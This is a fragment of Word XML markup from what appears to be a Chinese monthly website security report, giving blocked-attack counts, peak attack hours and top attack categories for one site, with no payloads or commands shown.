    <w:p w:rsidP="00EA311D" w:rsidR="00C82032" w:rsidRDefault="00C82032" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="147147"/>
        <w:spacing w:after="0" w:afterLines="0" w:before="0" w:beforeLines="0"/>
        <w:ind w:firstLine="400" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>根据风暴中心拦截攻击情况来看，该站群主要受到攻击的时间段为10时、16时和22时。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="00DC0775" w:rsidRDefault="00DC0775" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="147147"/>
        <w:spacing w:after="0" w:afterLines="0" w:before="0" w:beforeLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击时间</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>段趋势</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="00DC0775" w:rsidRDefault="00DC0775" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="fontstyle11"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distR="0">
            <wp:extent cx="5274310" cy="3178575"/>
            <wp:effectExtent l="19050" t="0" r="21590" b="0"/>
            <wp:docPr id="1" name="Chart 1"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
                <c:chart xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" r:id="rId13"/>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="00DC0775" w:rsidRDefault="00DC0775" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc518464532"/>
      <w:bookmarkStart w:id="8" w:name="_Toc531180261"/>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>网站安全</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="00DC0775" w:rsidRDefault="00DC0775" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="147147"/>
        <w:spacing w:after="0" w:afterLines="0" w:before="0" w:beforeLines="0"/>
        <w:ind w:firstLine="400" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>期间合同站点累计遭受946次攻击，主要攻击目标为(www.dingxinsec.com.cn，攻击量899次，占比95.03%)、(www.dingxinsec.com.cn:443，攻击量47次，占比4.97%)等站点，以上攻击被有效阻断，未造成攻击成功或篡改成功的安全事件。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="00A714BD" w:rsidRDefault="00A714BD" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="bottom"/>
        <w:rPr>
          <w:rStyle w:val="fontstyle11"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distR="0">
            <wp:extent cx="5274310" cy="3178575"/>
            <wp:effectExtent l="19050" t="0" r="21590" b="0"/>
            <wp:docPr id="1" name="Chart 1"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
                <c:chart xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" r:id="rId14"/>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>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660"/>
        <w:gridCol w:w="2075"/>
        <w:gridCol w:w="1079"/>
        <w:gridCol w:w="1079"/>
        <w:gridCol w:w="1079"/>
        <w:gridCol w:w="664"/>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攻击类型 TOP5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击次数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击占比</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>对比分析</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>风险等级</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tcPr>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>【</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>高</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>】文件限制(345)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>，【</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>高</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>】系统命令访问攻击(216)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>，【</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>高</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>】命令注入攻击(130)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>，【</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>高</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>】漏洞防护(94)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>，【</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>高</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>】恶意user-agents(37)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>899</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>95.03%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>较上月--，攻击占比--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>低</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>(www.dingxinsec.com.cn:443)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
          </w:tcPr>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>【</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>高</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>】恶意user-agents(34)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>，【</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>高</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>】漏洞防护(9)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>，【</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>高</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>】文件限制(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>47</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>4.97%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>较上月--，攻击占比--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>低</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidP="00EA311D" w:rsidR="00DC0775" w:rsidRDefault="00DC0775" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="bottom"/>
        <w:rPr>
          <w:rStyle w:val="fontstyle11"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidP="00125681" w:rsidR="00B22C0B" w:rsidRDefault="00B22C0B" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:hanging="357" w:left="357"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc531180262"/>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>高级攻击威胁详情分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="00384983" w:rsidRDefault="00384983" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc518464536"/>
      <w:bookmarkStart w:id="11" w:name="_Toc531180263"/>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>扫描攻击详情</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="00384983" w:rsidRDefault="00384983" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="147147"/>
        <w:spacing w:after="0" w:afterLines="0" w:before="0" w:beforeLines="0"/>
        <w:ind w:firstLine="400" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>本月未受到扫描攻击</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="00384983" w:rsidRDefault="00384983">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D96623">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidP="00DD47B1" w:rsidR="00DD47B1" w:rsidRDefault="00DD47B1" w:rsidRPr="00DD47B1">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc530664014"/>
      <w:bookmarkStart w:id="13" w:name="_Toc531180264"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD47B1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD47B1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>攻击详情</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidP="00DD47B1" w:rsidR="00DD47B1" w:rsidRDefault="00DD47B1" w:rsidRPr="00DD47B1">
      <w:pPr>
        <w:pStyle w:val="147147"/>
        <w:spacing w:after="0" w:afterLines="0" w:before="0" w:beforeLines="0"/>
        <w:ind w:firstLine="400" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD47B1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>本月未受到webshell攻击</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidP="00DD47B1" w:rsidR="00DD47B1" w:rsidRDefault="00DD47B1" w:rsidRPr="00DD47B1">
      <w:pPr>
        <w:pStyle w:val="147147"/>
        <w:spacing w:after="0" w:afterLines="0" w:before="0" w:beforeLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053B57">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidP="00125681" w:rsidR="00B22C0B" w:rsidRDefault="00B22C0B" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:hanging="357" w:left="357"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc531180265"/>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全风险详情分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="00B22C0B" w:rsidRDefault="00B22C0B" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc531180266"/>
      <w:bookmarkStart w:id="16" w:name="_Toc518464538"/>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击类型详情分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="00053B57" w:rsidRDefault="00053B57" w:rsidRPr="00D96623">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:afterLines="1" w:beforeLines="1" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D96623">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:b w:val="true"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val=""/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
